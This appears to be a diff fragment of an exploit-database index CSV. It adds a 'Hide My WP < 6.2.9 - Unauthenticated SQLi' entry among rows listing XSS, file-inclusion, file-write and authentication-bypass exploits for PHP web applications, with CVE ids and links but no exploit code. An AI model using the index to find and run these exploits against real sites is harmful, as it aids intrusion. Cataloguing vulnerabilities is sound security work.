 34418,exploits/php/webapps/34418.txt,"Dataface 1.0 - 'admin.php' Cross-Site Scripting",2010-08-06,MustLive,webapps,php,,2010-08-06,2014-08-26,1,,,,,,https://www.securityfocus.com/bid/42282/info
 32226,exploits/php/webapps/32226.txt,"Datafeed Studio - 'patch.php' Remote File Inclusion",2008-08-12,"Bug Researchers Group",webapps,php,,2008-08-12,2014-03-13,1,CVE-2008-4439;OSVDB-48829,,,,,https://www.securityfocus.com/bid/30659/info
@ -19524,6 +19529,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49667,exploits/php/webapps/49667.txt,"Hestia Control Panel 1.3.2 - Arbitrary File Write",2021-03-18,"numan türle",webapps,php,,2021-03-18,2021-03-18,0,,,,,,
 34072,exploits/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,webapps,php,,2010-06-01,2014-07-15,1,,,,,,https://www.securityfocus.com/bid/40509/info
 12839,exploits/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,webapps,php,,2010-05-31,,0,,,,,http://www.exploit-db.comHexjector_v1.0.7.2.zip,
+51871,exploits/php/webapps/51871.txt,"Hide My WP < 6.2.9 - Unauthenticated SQLi",2024-03-10,"Xenofon Vassilakopoulos",webapps,php,,2024-03-10,2024-03-10,0,CVE-2022-4681,,,,,
 41044,exploits/php/webapps/41044.txt,"Hindu Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",webapps,php,,2017-01-14,2017-01-14,0,,,,,,
 5981,exploits/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Remote File Inclusion",2008-06-30,"Ghost Hacker",webapps,php,,2008-06-29,2016-12-14,1,OSVDB-46636;CVE-2008-3127,,,,http://www.exploit-db.comHBR_1_3.zip,
 6168,exploits/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin",2008-07-30,Stack,webapps,php,,2008-07-29,2016-12-21,1,,,,,http://www.exploit-db.comHBS_2_0.zip,